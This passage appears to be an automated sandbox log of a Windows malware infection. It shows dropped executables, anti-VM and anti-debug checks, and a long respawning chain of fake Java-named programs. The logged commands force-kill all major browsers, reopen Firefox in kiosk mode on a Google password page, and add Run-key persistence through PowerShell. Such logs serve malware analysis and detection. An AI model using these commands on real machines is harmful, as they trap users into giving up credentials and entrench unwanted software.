- - C:\Users\Admin\AppData\Local\Temp\10364770101\614ca3f7af.exe
    "C:\Users\Admin\AppData\Local\Temp\10364770101\614ca3f7af.exe"
    3⤵
    PID:24424
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:6388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:3004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:12504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:10140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:9840
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:1992
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:1188
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1960 -prefsLen 27099 -prefMapHandle 1964 -prefMapSize 270279 -ipcHandle 2052 -initialChannelId {e672e9d1-4fae-46f5-968c-5efaeaa601fc} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:8656
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {5ce18d2f-638e-487f-a57c-61cc68e9a5fa} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:8468
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3700 -prefsLen 25164 -prefMapHandle 3704 -prefMapSize 270279 -jsInitHandle 3708 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3732 -initialChannelId {d7efdd01-c7c3-422c-bf9f-a50400884b14} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        
        PID:7532
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3888 -prefsLen 27276 -prefMapHandle 3892 -prefMapSize 270279 -ipcHandle 3988 -initialChannelId {dec86bbe-a461-41ec-8fd3-5da5985cf12a} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:7456
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4316 -prefsLen 34775 -prefMapHandle 4320 -prefMapSize 270279 -jsInitHandle 4324 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4332 -initialChannelId {a829b4c4-1777-420f-928c-3d2ed713da4e} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        
        PID:6576
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4720 -prefsLen 35012 -prefMapHandle 4712 -prefMapSize 270279 -ipcHandle 5116 -initialChannelId {24cc902c-2da3-4e41-b159-732cd52f400a} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        
        PID:11168
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4740 -prefsLen 32952 -prefMapHandle 4764 -prefMapSize 270279 -jsInitHandle 5220 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5380 -initialChannelId {0812e170-fb97-4771-9089-b5c86adc2bb4} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        
        PID:10628
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {5c5d1854-8fd0-4ace-8903-5d376031b556} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        
        PID:10540
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5628 -prefsLen 32952 -prefMapHandle 5632 -prefMapSize 270279 -jsInitHandle 5636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {60b265c2-be91-479c-bfe4-a7c835294599} -parentPid 1188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        
        PID:10316
- - C:\Users\Admin\AppData\Local\Temp\10364780101\9ec43c17c0.exe
    "C:\Users\Admin\AppData\Local\Temp\10364780101\9ec43c17c0.exe"
    3⤵
    PID:10976
- - C:\Users\Admin\AppData\Local\Temp\10364790101\ac078fd49b.exe
    "C:\Users\Admin\AppData\Local\Temp\10364790101\ac078fd49b.exe"
    3⤵
    PID:9616
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10364790101\ac078fd49b.exe"
      4⤵
      PID:8892
- - C:\Users\Admin\AppData\Local\Temp\10364800101\e2e936c2f8.exe
    "C:\Users\Admin\AppData\Local\Temp\10364800101\e2e936c2f8.exe"
    3⤵
    PID:2900
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10364800101\e2e936c2f8.exe"
      4⤵
      PID:8488

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1112

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6128

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5552

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1772

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:5136

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe"
1⤵
PID:2192
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
  2⤵
  PID:5768
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
    3⤵
    PID:1160
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
      4⤵
      PID:5964
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        5⤵
        
        PID:5228
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        6⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        7⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        8⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        9⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        10⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        11⤵
        
        PID:3264
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
        12⤵
        Modifies registry key
        
        PID:4956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupportw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe\"'"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3252 -ip 3252
1⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe"
1⤵
PID:2880
- C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  2⤵
  PID:4472
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
    3⤵
    PID:848
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      4⤵
      PID:724
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        5⤵
        
        PID:3988
      - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        6⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        7⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        9⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        10⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        11⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        12⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        13⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        14⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        15⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        16⤵
        
        PID:4064
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_platform.exe"
        17⤵
        Modifies registry key
        
        PID:2480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe\"'"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe"
1⤵
PID:5604
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
  2⤵
  PID:3124
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
    3⤵
    PID:1312
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
      4⤵
      PID:5288
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        5⤵
        
        PID:4132
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        6⤵
        
        PID:816
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        7⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        9⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        10⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        11⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        12⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        13⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        14⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        15⤵
        
        PID:2460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        16⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        17⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        18⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        19⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        20⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        21⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        22⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        24⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        25⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        26⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        27⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        28⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        29⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        30⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        31⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        32⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        33⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        34⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        35⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        36⤵
        
        PID:6152
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        37⤵
        
        PID:6196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        38⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        39⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        40⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        41⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        42⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        43⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        44⤵
        
        PID:6940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        45⤵
        
        PID:7068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        46⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        47⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        48⤵
        
        PID:7404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        49⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        50⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        51⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        52⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        53⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        54⤵
        
        PID:8308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        55⤵
        
        PID:8552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        56⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        57⤵
        
        PID:8828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        58⤵
        
        PID:8948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        59⤵
        
        PID:9088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        60⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        61⤵
        
        PID:9344
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        62⤵
        
        PID:9504
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        63⤵
        
        PID:9624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        64⤵
        
        PID:9732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        65⤵
        
        PID:9856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        66⤵
        
        PID:10140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        67⤵
        
        PID:10272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        68⤵
        
        PID:10440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        69⤵
        
        PID:10668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        70⤵
        
        PID:10796
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        71⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        72⤵
        
        PID:11220
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        73⤵
        
        PID:11340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        74⤵
        
        PID:11536
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        75⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        76⤵
        
        PID:11740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        77⤵
        
        PID:11832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        78⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        79⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        80⤵
        
        PID:12204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        81⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
